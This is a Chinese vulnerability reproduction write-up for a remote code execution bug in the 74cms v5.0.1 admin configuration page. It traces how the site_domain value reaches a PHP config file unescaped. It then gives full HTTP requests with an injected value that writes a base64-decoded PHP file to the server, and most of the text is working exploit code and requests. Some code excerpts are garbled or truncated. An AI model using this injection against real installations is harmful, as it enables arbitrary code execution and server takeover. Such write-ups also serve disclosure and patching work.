74cms_v5.0.1远程执行代码

# 74cms v5.0.1远程执行代码

========================

一、漏洞简介
————

二、漏洞影响
————

74cms v5.0.1

三、复现过程
————

### 漏洞分析


POST /74cms/index.php?m=Admin&c=config&a=edit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/74cms/index.php?m=Admin&c=Config&a=index
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 391
Connection: close
Cookie: PHPSESSID=arm0lvlbbfocml5vvac1tf3ph3; think_language=zh-CN; think_template=default

site_name=%E9%AA%91%E5%A3%AB%E4%BA%BA%E6%89%8D%E7%B3%BB%E7%BB%9F&site_domain=127.0.0.1&site_dir=%2F74cms%2F&top_tel=000-00000000&bootom_tel=000-00000000&contact_email=&address=00%E7%9C%8100%E5%B8%8200%E8%B7%AF00%E5%8F%B70%E5%A4%A7%E5%8E%A600%E6%A5%BC&bottom_other=Copyright+%C2%A9+2019+74cms.com+All+Right+Reserved+&icp=icp000000000&isclose=0&close_reason=&statistics=&logo_home=&logo_other=

c=config&a=edit -\> Controller=config&action=edit -\>
/Application/Admin/Controller/ConfigController.class.php Line 9:
I(\’request.site\_domain\’,\’\’,\’trim\’) -\> trim(\$site\_domain,\’/\’)
-\> \’.\’.implode(\’.\’,\$domain) -\> array(\’domain\’=\>\$domain) -\>
\$this-\>update\_config(\$config,CONF\_PATH.\’url.php\’)

public function edit(){
if(IS_POST){
$site_domain = I(‘request.site_domain’,”,’trim’);
$site_domain = trim($site_domain,’/’);
$site_dir = I(‘request.site_dir’,C(‘qscms_site_dir’),’trim’);
$site_dir = $site_dir==”?’/’:$site_dir;
$site_dir = $site_dir==’/’?$site_dir:(‘/’.trim($site_dir,’/’).’/’);
$_POST[‘site_dir’] = $site_dir;
if($site_domain && $site_domain != C(‘qscms_site_domain’)){
if($site_domain == C(‘qscms_wap_domain’)){
$this->returnMsg(0,’主域名不能与触屏版域名重复！’);
}
$str = str_replace(‘http://’,”,$site_domain);
$str = str_replace(‘https://’,”,$str);
if(preg_match(‘/com.cn|net.cn|gov.cn|org.cn$/’,$str) === 1){
$domain = array_slice(explode(‘.’, $str), -3, 3);
}else{
$domain = array_slice(explode(‘.’, $str), -2, 2);
}
$domain = ‘.’.implode(‘.’,$domain);
$config[‘SESSION_OPTIONS’] = array(‘domain’=>$domain);
$config[‘COOKIE_DOMAIN’] = $domain;
$this->update_config($config,CONF_PATH.’url.php’);
}

/ThinkPHP/Common/functions.php第271行中的I（\’request.site\_domain\’，\’\’，\’trim\’）是字符串。request.site\_domain-\>
\$ \_REQUEST \[\’site\_domain\’\]-\> \$ \_ REQUEST
\[\’site\_domain\’\]是字符串-\>修剪（\$ \_REQUEST \[\’site\_domain\’\]）

function I($name,$default=”,$filter=null,$datas=null) {
…
if(strpos($name,’.’)) { // 指定参数来源
list($method,$name) = explode(‘.’,$name,2);
}else{ // 默认为自动判断
$method = ‘param’;
}
switch(strtolower($method)) {
case ‘get’ :
$input =& $_GET;
break;
case ‘post’ :
$input =& $_POST;
break;
…
case ‘request’ :
$input =& $_REQUEST;
break;
…
}
if(”==$name) { // 获取全部变量
…
}
}elseif(isset($input[$name])) { // 取值操作
$data = $input[$name];
$filters = isset($filter) ? $filter.’,’.C(‘DEFAULT_FILTER’) : C(‘DEFAULT_FILTER’);
//$filters = isset($filter)?$filter:C(‘DEFAULT_FILTER’);
if($filters) {
if(is_string($filters)){
if(0 === strpos($filters,’/’)){
if(1 !== preg_match($filters,(string)$data)){
// 支持正则验证
return isset($default) ? $default : null;
}
}else{
$filters = explode(‘,’,$filters);
}
}elseif(is_int($filters)){
$filters = array($filters);
}

if(is_array($filters)){
foreach($filters as $filter){
if(function_exists($filter)) {
$data = is_array($data) ? array_map_recursive($filter,$data) : $filter($data); // 参数过滤
}else{
$data = filter_var($data,is_int($filter) ? $filter : filter_id($filter));
if(false === $data) {
return isset($default) ? $default : null;
}
}
}
}
}
if(!empty($type)){
…
}else{ // 变量默认值
$data = isset($default)?$default:null;
}
is_array($data) && array_walk_recursive($data,’think_filter’);
return $data;
}

返回到/Application/Admin/Controller/ConfigController.class.php第29行：array（\’SESSION\_OPTIONS\’=\>
array（\’domain\’=\> \$ domain），\’COOKIE\_DOMAIN\’=\> \$ domain） -\>
update\_config（\$ config， CONF\_PATH.\’url.php\’）

$config[‘SESSION_OPTIONS’] = array(‘domain’=>$domain);
$config[‘COOKIE_DOMAIN’] = $domain;
$this->update_config($config,CONF_PATH.’url.php’);

/Application/Common/Controller/BackendController.class.php第467
行中的update\_config（\$ config，CONF\_PATH.\’url.php\’）：

multimerge（\$ config，\$ new\_config） -\> file\_put\_contents（\$
config\_file，” \<？php \\ nreturn"。stripslashes（var\_export（\$ config，true））。";"，LOCK\_EX） public function update_config($new_config, $config_file = '') { !is_file($config_file) && $config_file = HOME_CONFIG_PATH . 'config.php'; if (is_writable($config_file)) { $config = require $config_file; $config = multimerge($config, $new_config); if($config['SESSION_OPTIONS']){ $config['SESSION_OPTIONS']['path'] = SESSION_PATH; } file_put_contents($config_file, " $v) {
if (is_array($v) && count($v)) {
$a[$k] = in_array($k, array(‘SESSION_OPTIONS’)) ? multimerge($a[$k], $v) : $v;
} else {
$a[$k] = $v;
}
}
} else {
$a = $b;
}
return $a;
}

CONF\_PATH in /ThinkPHP/ThinkPHP.php Line 54: CONF\_PATH.\’url.php\’ -\>
/Application/Common/Conf/url.php

defined(‘COMMON_PATH’) or define(‘COMMON_PATH’, APP_PATH.’Common/’); // 应用公共目录
defined(‘CONF_PATH’) or define(‘CONF_PATH’, COMMON_PATH.’Conf/’);
define(‘APP_PATH’,’./Application/’);

var\_export(): Quote string with slashes&Convert special characters to
HTML entities -\> stripslashes(): un-quotes a quoted string -\> Convert
special characters to HTML entities -\> write file

file_put_contents($config_file, “ 0,
‘URL_HTML_SUFFIX’ => ‘.html’,
‘URL_PATHINFO_DEPR’ => ‘/’,
‘URL_ROUTER_ON’ => true,
‘URL_ROUTE_RULES’ =>
array (
‘/^jobfair\/(?!admin)(\w+)$/’ => ‘jobfair/index/:1’,
‘/^mall\/(?!admin)(\w+)$/’ => ‘mall/index/:1’,
),
‘QSCMS_VERSION’ => ‘5.0.1’,
‘QSCMS_RELEASE’ => ‘2019-03-19 00:00:00’,
‘SESSION_OPTIONS’ =>
array (
‘domain’ => ‘.0.1’,
0 => 18,
1 => ”,
‘path’ => ‘D:\***\***\***\WWW\74cms\data\session’,
),
‘COOKIE_DOMAIN’ => ‘.0.1′,
0 => 18,
1 => ”,
);

### 复现poc

-\> PD9waHAgcGhwaW5mbygpOz8+

site\_domain=\’,
file\_put\_contents(\’403.php\’,base64\_decode(\’PD9waHAgcGhwaW5mbygpOz8+\’)),\’

POST /74cms/index.php?m=Admin&c=config&a=edit HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/74cms/index.php?m=Admin&c=Config&a=index
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 465
Connection: close
Cookie: PHPSESSID=arm0lvlbbfocml5vvac1tf3ph3; think_language=zh-CN; think_template=default

site_name=%E9%AA%91%E5%A3%AB%E4%BA%BA%E6%89%8D%E7%B3%BB%E7%BB%9F&site_domain=’%2C+file_put_contents(‘403.php’%2Cbase64_decode(‘PD9waHAgcGhwaW5mbygpOz8%2B’))%2C’&site_dir=%2F74cms%2F&top_tel=000-00000000&bootom_tel=000-00000000&contact_email=&address=00%E7%9C%8100%E5%B8%8200%E8%B7%AF00%E5%8F%B70%E5%A4%A7%E5%8E%A600%E6%A5%BC&bottom_other=Copyright+%C2%A9+2019+74cms.com+All+Right+Reserved+&icp=icp000000000&isclose=0&close_reason=&statistics=&logo_home=&logo_other=
GET /74cms/Application/Common/Conf/url.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=arm0lvlbbfocml5vvac1tf3ph3; think_language=zh-CN; think_template=default
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

成功截图


四、参考链接
————

> https://github.com/kyrie403/Vuln/blob/master/74cms/74cms%20v5.0.1%20remote%20code%20execution.md